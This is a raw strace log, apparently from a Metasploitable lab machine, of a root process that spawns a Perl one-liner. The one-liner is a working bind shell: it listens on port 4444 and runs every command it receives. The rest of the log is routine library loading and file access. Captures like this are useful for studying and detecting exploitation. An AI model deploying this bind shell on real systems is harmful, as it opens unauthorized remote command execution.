5340  07:08:40.806000 close(1)          = 0

5340  07:08:40.806041 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5340  07:08:40.806055 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

5340  07:08:40.806087 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

5340  07:08:40.806173 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

5340  07:08:40.806190 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d64000

5340  07:08:40.806201 mmap2(0xb7d6d000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d6d000

5340  07:08:40.806216 close(1)          = 0

5340  07:08:40.806237 munmap(0xb7f1f000, 29913) = 0

5340  07:08:40.806252 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

5340  07:08:40.806266 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

5340  07:08:40.806277 _llseek(1, 0, [0], SEEK_CUR) = 0

5340  07:08:40.806289 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

5340  07:08:40.806305 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f26000

5340  07:08:40.806315 _llseek(1, 1624, [1624], SEEK_SET) = 0

5340  07:08:40.806330 munmap(0xb7f26000, 1624) = 0

5340  07:08:40.806339 close(1)          = 0

5340  07:08:40.806368 getpgrp()         = 3831

5340  07:08:40.806378 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

5340  07:08:40.806392 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

5340  07:08:40.806408 brk(0x8101000)    = 0x8101000

5340  07:08:40.806438 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5340  07:08:40.806452 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5340  07:08:40.806467 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5340  07:08:40.806540 brk(0x8102000)    = 0x8102000

5340  07:08:40.806585 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5340  07:08:40.806603 stat64("/sbin/AB", 0xbfe5fcb8) = -1 ENOENT (No such file or directory)

5340  07:08:40.806615 stat64("/bin/AB", 0xbfe5fcb8) = -1 ENOENT (No such file or directory)

5340  07:08:40.806629 stat64("/usr/sbin/AB", 0xbfe5fcb8) = -1 ENOENT (No such file or directory)

5340  07:08:40.806641 stat64("/usr/bin/AB", 0xbfe5fcb8) = -1 ENOENT (No such file or directory)

5340  07:08:40.806654 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

5340  07:08:40.806668 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d9a6f8) = 5341

5341  07:08:40.806714 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5341  07:08:40.806730 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

5341  07:08:40.806744 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

5341  07:08:40.806755 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

5341  07:08:40.806770 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5341  07:08:40.806785 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

5341  07:08:40.806798 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

5341  07:08:40.806851 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

5341  07:08:40.806865 --- SIGPIPE (Broken pipe) @ 0 (0) ---

5341  07:08:40.806937 exit_group(127)   = ?

5340  07:08:40.811966 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5340  07:08:40.811967 --- SIGCHLD (Child exited) @ 0 (0) ---

5340  07:08:40.811967 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 5341

5340  07:08:40.811967 waitpid(-1, 0xbfe5f938, WNOHANG) = -1 ECHILD (No child processes)

5340  07:08:40.811967 sigreturn()       = ? (mask now [])

5340  07:08:40.811967 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

5340  07:08:40.811968 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5340  07:08:40.811968 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

5340  07:08:40.811968 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

5340  07:08:40.811968 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5340  07:08:40.811969 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

5340  07:08:40.811969 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5340  07:08:40.811969 stat64("/sbin/perl", 0xbfe5fce8) = -1 ENOENT (No such file or directory)

5340  07:08:40.811969 stat64("/bin/perl", 0xbfe5fce8) = -1 ENOENT (No such file or directory)

5340  07:08:40.811969 stat64("/usr/sbin/perl", 0xbfe5fce8) = -1 ENOENT (No such file or directory)

5340  07:08:40.811973 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

5340  07:08:40.811991 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

5340  07:08:40.812031 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

5340  07:08:40.812090 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d9a6f8) = 5342

5342  07:08:40.839694 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5342  07:08:40.839730 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

5342  07:08:40.839745 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

5342  07:08:40.839770 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

5342  07:08:40.839785 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5342  07:08:40.839801 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

5342  07:08:40.839814 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

5342  07:08:40.839851 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

5342  07:08:40.839946 brk(0)            = 0x8153000

5342  07:08:40.839966 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5342  07:08:40.839984 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fdc000

5342  07:08:40.839999 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

5342  07:08:40.840016 open("/etc/ld.so.cache", O_RDONLY) = 1

5342  07:08:40.840029 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5342  07:08:40.840088 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fd4000

5342  07:08:40.840119 close(1)          = 0

5342  07:08:40.840145 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5342  07:08:40.840162 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

5342  07:08:40.840178 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

5342  07:08:40.840356 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

5342  07:08:40.840388 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7fd0000

5342  07:08:40.840401 mmap2(0xb7fd2000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7fd2000

5342  07:08:40.840417 close(1)          = 0

5342  07:08:40.840429 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5342  07:08:40.840456 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

5342  07:08:40.840470 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

5342  07:08:40.840594 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

5342  07:08:40.840626 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7fab000

5342  07:08:40.840651 mmap2(0xb7fce000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7fce000

5342  07:08:40.840667 close(1)          = 0

5342  07:08:40.840678 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5342  07:08:40.840692 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

5342  07:08:40.840706 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

5342  07:08:40.840794 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

5342  07:08:40.840810 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7faa000

5342  07:08:40.840823 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f92000

5342  07:08:40.840833 mmap2(0xb7fa6000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7fa6000

5342  07:08:40.840848 mmap2(0xb7fa8000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7fa8000

5342  07:08:40.840861 close(1)          = 0

5342  07:08:40.840872 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5342  07:08:40.840886 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

5342  07:08:40.840899 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

5342  07:08:40.840985 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

5342  07:08:40.841003 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e43000

5342  07:08:40.841013 mmap2(0xb7f8c000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f8c000

5342  07:08:40.841027 mmap2(0xb7f8f000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f8f000

5342  07:08:40.841067 close(1)          = 0

5342  07:08:40.841080 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5342  07:08:40.841123 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

5342  07:08:40.841147 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

5342  07:08:40.841237 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

5342  07:08:40.841254 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e11000

5342  07:08:40.841265 mmap2(0xb7e1a000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7e1a000

5342  07:08:40.841279 mmap2(0xb7e1c000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7e1c000

5342  07:08:40.841293 close(1)          = 0

5342  07:08:40.841317 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e10000

5342  07:08:40.841329 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e108c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

5342  07:08:40.841390 mprotect(0xb7f8c000, 4096, PROT_READ) = 0

5342  07:08:40.841416 munmap(0xb7fd4000, 29913) = 0

5342  07:08:40.841439 set_tid_address(0xb7e10908) = 5342

5342  07:08:40.841463 set_robust_list(0xb7e10910, 0xc) = 0

5342  07:08:40.841486 futex(0xbfee0b80, 0x81 /* FUTEX_??? */, 1) = 0

5342  07:08:40.841501 rt_sigaction(SIGRTMIN, {0xb7f962c0, [], SA_SIGINFO}, NULL, 8) = 0

5342  07:08:40.841514 rt_sigaction(SIGRT_1, {0xb7f96340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

5342  07:08:40.841605 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

5342  07:08:40.841635 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

5342  07:08:40.841655 uname({sys="Linux", node="metasploitable", ...}) = 0

5342  07:08:40.841716 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

5342  07:08:40.841761 brk(0)            = 0x8153000

5342  07:08:40.841770 brk(0x8174000)    = 0x8174000

5342  07:08:40.841814 getuid32()        = 0

5342  07:08:40.841824 geteuid32()       = 0

5342  07:08:40.841833 getgid32()        = 0

5342  07:08:40.841842 getegid32()       = 0

5342  07:08:40.841897 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7def000

5342  07:08:40.841939 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

5342  07:08:40.841957 read(1, "\326\241`\315", 4) = 4

5342  07:08:40.841973 close(1)          = 0

5342  07:08:40.841992 time(NULL)        = 1495624120

5342  07:08:40.842074 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfee0850) = -1 ENOENT (No such file or directory)

5342  07:08:40.842123 stat64("/usr/local/lib/site_perl/5.8.8", 0xbfee0850) = -1 ENOENT (No such file or directory)

5342  07:08:40.842136 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbfee0850) = -1 ENOENT (No such file or directory)

5342  07:08:40.842165 stat64("/usr/local/lib/perl/5.8.7", 0xbfee0990) = -1 ENOENT (No such file or directory)

5342  07:08:40.842177 stat64("/usr/local/share/perl/5.8.7", 0xbfee0990) = -1 ENOENT (No such file or directory)

5342  07:08:40.842189 stat64("/usr/local/lib/perl/5.8.6", 0xbfee0990) = -1 ENOENT (No such file or directory)

5342  07:08:40.842201 stat64("/usr/local/share/perl/5.8.6", 0xbfee0990) = -1 ENOENT (No such file or directory)

5342  07:08:40.842212 stat64("/usr/local/lib/perl/5.8.4", 0xbfee0990) = -1 ENOENT (No such file or directory)

5342  07:08:40.842224 stat64("/usr/local/share/perl/5.8.4", 0xbfee0990) = -1 ENOENT (No such file or directory)

5342  07:08:40.842235 stat64("/usr/local/lib/perl/5.8.3", 0xbfee0990) = -1 ENOENT (No such file or directory)

5342  07:08:40.842246 stat64("/usr/local/share/perl/5.8.3", 0xbfee0990) = -1 ENOENT (No such file or directory)

5342  07:08:40.842258 stat64("/usr/local/lib/perl/5.8.2", 0xbfee0990) = -1 ENOENT (No such file or directory)

5342  07:08:40.842269 stat64("/usr/local/share/perl/5.8.2", 0xbfee0990) = -1 ENOENT (No such file or directory)

5342  07:08:40.842281 stat64("/usr/local/lib/perl/5.8.1", 0xbfee0990) = -1 ENOENT (No such file or directory)

5342  07:08:40.842297 stat64("/usr/local/share/perl/5.8.1", 0xbfee0990) = -1 ENOENT (No such file or directory)

5342  07:08:40.842309 stat64("/usr/local/lib/perl/5.8.0", 0xbfee0990) = -1 ENOENT (No such file or directory)

5342  07:08:40.842320 stat64("/usr/local/share/perl/5.8.0", 0xbfee0990) = -1 ENOENT (No such file or directory)

5342  07:08:40.842343 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfee0688) = -1 ENOTTY (Inappropriate ioctl for device)

5342  07:08:40.842356 _llseek(0, 0, [0], SEEK_CUR) = 0

5342  07:08:40.842368 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfee0688) = -1 EBADF (Bad file descriptor)

5342  07:08:40.842378 _llseek(1, 0, 0xbfee06d0, SEEK_CUR) = -1 EBADF (Bad file descriptor)

5342  07:08:40.842389 ioctl(2, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfee0688) = -1 EINVAL (Invalid argument)

5342  07:08:40.842400 _llseek(2, 0, 0xbfee06d0, SEEK_CUR) = -1 ESPIPE (Illegal seek)

5342  07:08:40.842410 open("/dev/null", O_RDONLY|O_LARGEFILE) = 1

5342  07:08:40.842422 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfee0748) = -1 ENOTTY (Inappropriate ioctl for device)

5342  07:08:40.842432 _llseek(1, 0, [0], SEEK_CUR) = 0

